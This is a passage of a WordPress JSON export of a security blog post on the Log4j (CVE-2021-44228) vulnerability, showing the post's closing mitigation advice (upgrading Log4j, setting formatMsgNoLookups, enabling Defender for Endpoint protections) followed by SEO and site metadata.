https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-15_21-58-51-768x174.png 768w, https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-15_21-58-51-585x133.png 585w\" sizes=\"(max-width: 548px) 100vw, 548px\" \/><\/p>\r\n<hr \/>\r\n<h2 class=\"wcd-font-weight-bold\">Mitigations<\/h2>\r\n<p>Apply these mitigations to reduce the impact:<\/p>\r\n<p><strong>Log4j components<\/strong><\/p>\r\n<ul>\r\n<li>Update all Log4j2 deployments to use\u00a0<strong>log4j-2.16.0<\/strong><\/li>\r\n<li>Upgrade all products, applications, and components that consume Log4j2<\/li>\r\n<li>In situations where the component cannot be updated, configure the parameter log4j2.formatMsgNoLookups to be set to \u2018<strong>true<\/strong>\u2019\u00a0<\/li>\r\n<\/ul>\r\n<p><strong>OS<\/strong><\/p>\r\n<ul>\r\n<li>Install latest OS updates and latest security updates when available<\/li>\r\n<li>Use supported Windows 10 version<\/li>\r\n<li>Patch applications\u00a0<\/li>\r\n<\/ul>\r\n<p><strong>Defender for Endpoint<\/strong><\/p>\r\n<ul>\r\n<li>Enable EDR in block mode<\/li>\r\n<li>Install the latest Defender for Endpoint product update and signature update<\/li>\r\n<li>Turn on Cloud-delivered protection<\/li>\r\n<li>Configure investigation and remediation<\/li>\r\n<li>Enable Tamper protection, PUA, Network Protection\u00a0<\/li>\r\n<\/ul>\r\n<p><strong>Important:<\/strong> Not all mitigations are listed. Read all the recommendations by Microsoft and other security vendors for the complete list of mitigations.\u00a0<\/p>\r\n<hr \/>\r\n<h2>Conclusion<\/h2>\r\n<p>Don&#8217;t forget to read all the recommendations by Microsoft and other security vendors for mitigations, protections, and detections rules. This blog contains only the first parts based on Microsoft Defender for Endpoint and some of the functions which can help with the detection of Log4J with existing device data.\u00a0<\/p>","protected":false},"excerpt":{"rendered":"<p>One of the most important and trending topics in the last couple of days is related to Log4j, log4shell, and the attached CVE 2021-44228. A zero-day vulnerability (CVE-2021-44228), publicly released on 9 December 2021 and known as Log4j or Log4Shell,&#8230;<\/p>\n","protected":false},"author":1,"featured_media":4095,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[189],"tags":[219],"table_tags":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v22.9 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Log4j and CVE-2021-44228: Use Microsoft Defender for Endpoint for software\/ threat investigation<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/jeffreyappel.nl\/microsoft-defender-for-endpoint-log4j\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Log4j and CVE-2021-44228: Use Microsoft Defender for Endpoint for software\/ threat investigation\" \/>\n<meta property=\"og:description\" content=\"One of the most important and trending topics in the last couple of days is related to Log4j, log4shell, and the attached CVE 2021-44228. A zero-day vulnerability (CVE-2021-44228), publicly released on 9 December 2021 and known as Log4j or Log4Shell,...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/jeffreyappel.nl\/microsoft-defender-for-endpoint-log4j\/\" \/>\n<meta property=\"og:site_name\" content=\"Jeffrey Appel - Microsoft Security blog\" \/>\n<meta property=\"article:published_time\" content=\"2021-12-14T22:31:25+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2021-12-16T22:26:04+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_23-04-33.png\" \/>\n\t<meta property=\"og:image:width\" content=\"2685\" \/>\n\t<meta property=\"og:image:height\" content=\"1092\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Jeffrey\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Jeffrey\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"10 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/jeffreyappel.nl\/microsoft-defender-for-endpoint-log4j\/\",\"url\":\"https:\/\/jeffreyappel.nl\/microsoft-defender-for-endpoint-log4j\/\",\"name\":\"Log4j and CVE-2021-44228: Use Microsoft Defender for Endpoint for software\/ threat investigation\",\"isPartOf\":{\"@id\":\"https:\/\/jeffreyappel.nl\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/jeffreyappel.nl\/microsoft-defender-for-endpoint-log4j\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/jeffreyappel.nl\/microsoft-defender-for-endpoint-log4j\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_23-04-33.png\",\"datePublished\":\"2021-12-14T22:31:25+00:00\",\"dateModified\":\"2021-12-16T22:26:04+00:00\",\"author\":{\"@id\":\"https:\/\/jeffreyappel.nl\/#\/schema\/person\/ebdd80b67674ad29968ad249abc89c42\"},\"breadcrumb\":{\"@id\":\"https:\/\/jeffreyappel.nl\/microsoft-defender-for-endpoint-log4j\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/jeffreyappel.nl\/microsoft-defender-for-endpoint-log4j\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/jeffreyappel.nl\/microsoft-defender-for-endpoint-log4j\/#primaryimage\",\"url\":\"https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_23-04-33.png\",\"contentUrl\":\"https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_23-04-33.png\",\"width\":2685,\"height\":1092},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/jeffreyappel.nl\/microsoft-defender-for-endpoint-log4j\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/jeffreyappel.nl\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Log4j and CVE-2021-44228: Use Microsoft Defender for Endpoint for software\/ threat investigation\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/jeffreyappel.nl\/#website\",\"url\":\"https:\/\/jeffreyappel.nl\/\",\"name\":\"Jeffrey Appel - Microsoft Security blog\",\"description\":\"\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/jeffreyappel.nl\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/jeffreyappel.nl\/#\/schema\/person\/ebdd80b67674ad29968ad249abc89c42\",\"name\":\"Jeffrey\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/jeffreyappel.nl\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/37bbb7acc360ea70a60f26ca4548d940?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/37bbb7acc360ea70a60f26ca4548d940?s=96&d=mm&r=g\",\"caption\":\"Jeffrey\"},\"url\":\"https:\/\/jeffreyappel.nl\/author\/contact\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Log4j and CVE-2021-44228: Use Microsoft Defender for Endpoint for software\/ threat investigation","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/jeffreyappel.nl\/microsoft-defender-for-endpoint-log4j\/","og_locale":"en_US","og_type":"article","og_title":"Log4j and CVE-2021-44228: Use Microsoft Defender for Endpoint for software\/ threat investigation","og_description":"One of the most important and trending topics in the last couple of days is related to Log4j, log4shell, and the attached CVE 2021-44228. A zero-day vulnerability (CVE-2021-44228), publicly released on 9 December 2021 and known as Log4j or Log4Shell,...","og_url":"https:\/\/jeffreyappel.nl\/microsoft-defender-for-endpoint-log4j\/","og_site_name":"Jeffrey Appel - Microsoft Security blog","article_published_time":"2021-12-14T22:31:25+00:00","article_modified_time":"2021-12-16T22:26:04+00:00","og_image":[{"width":2685,"height":1092,"url":"https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_23-04-33.png","type":"image\/png"}],"author":"Jeffrey","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Jeffrey","Est. reading time":"10 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/jeffreyappel.nl\/microsoft-defender-for-endpoint-log4j\/","url":"https:\/\/jeffreyappel.nl\/microsoft-defender-for-endpoint-log4j\/","name":"Log4j and CVE-2021-44228: Use Microsoft Defender for Endpoint for software\/ threat investigation","isPartOf":{"@id":"https:\/\/jeffreyappel.nl\/#website"},"primaryImageOfPage":{"@id":"https:\/\/jeffreyappel.nl\/microsoft-defender-for-endpoint-log4j\/#primaryimage"},"image":{"@id":"https:\/\/jeffreyappel.nl\/microsoft-defender-for-endpoint-log4j\/#primaryimage"},"thumbnailUrl":"https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_23-04-33.png","datePublished":"2021-12-14T22:31:25+00:00","dateModified":"2021-12-16T22:26:04+00:00","author":{"@id":"https:\/\/jeffreyappel.nl\/#\/schema\/person\/ebdd80b67674ad29968ad249abc89c42"},"breadcrumb":{"@id":"https:\/\/jeffreyappel.nl\/microsoft-defender-for-endpoint-log4j\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/jeffreyappel.nl\/microsoft-defender-for-endpoint-log4j\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/jeffreyappel.nl\/microsoft-defender-for-endpoint-log4j\/#primaryimage","url":"https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_23-04-33.png","contentUrl":"https:\/\/jeffreyappel.nl\/wp-content\/uploads\/2021\/12\/2021-12-14_23-04-33.png","width":2685,"height":1092},{"@type":"BreadcrumbList","@id":"https:\/\/jeffreyappel.nl\/microsoft-defender-for-endpoint-log4j\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/jeffreyappel.nl\/"},{"@type":"ListItem","position":2,"name":"Log4j and CVE-2021-44228: Use Microsoft Defender for Endpoint for software\/ threat investigation"}]},{"@type":"WebSite","@id":"https:\/\/jeffreyappel.nl\/#website","url":"https:\/\/jeffreyappel.nl\/","name":"Jeffrey Appel - Microsoft Security blog","description":"","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/jeffreyappel.nl\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/jeffreyappel.nl\/#\/schema\/person\/ebdd80b67674ad29968ad249abc89c42","name":"Jeffrey","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/jeffreyappel.nl\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/37bbb7acc360ea70a60f26ca4548d940?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/37bbb7acc360ea70a60f26ca4548d940?s=96&d=mm&r=g","caption":"Jeffrey"},"url":"https:\/\/jeffreyappel.nl\/author\/contact\/"}]}},"amp_enabled":false,"_links":{"self":[{"href":"https:\/\/jeffreyappel.nl\/wp-json\/wp\/v2\/posts\/4077"}],"collection":[{"href":"https:\/\/jeffreyappel.nl\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/jeffreyappel.nl\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/jeffreyappel.nl\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/jeffreyappel.nl\/wp-json\/wp\/v2\/comments?post=4077"}],"version-history":[{"count":27,"href":"https:\/\/jeffreyappel.nl\/wp-json\/wp\/v2\/posts\/4077\/revisions"}],"predecessor-version":[{"id":4126,"href":"https:\/\/jeffreyappel.nl\/wp-json\/wp\/v2\/posts\/4077\/revisions\/4126"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/jeffreyappel.nl\/wp-json\/wp\/v2\/media\/4095"}],"wp:attachment":[{"href":"https:\/\/jeffreyappel.nl\/wp-json\/wp\/v2\/media?parent=4077"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/jeffreyappel.nl\/wp-json\/wp\/v2\/categories?post=4077"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/jeffreyappel.nl\/wp-json\/wp\/v2\/tags?post=4077"},{"taxonomy":"table_tags","embeddable":true,"href":"https:\/\/jeffreyappel.nl\/wp-json\/wp\/v2\/table_tags?post=4077"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}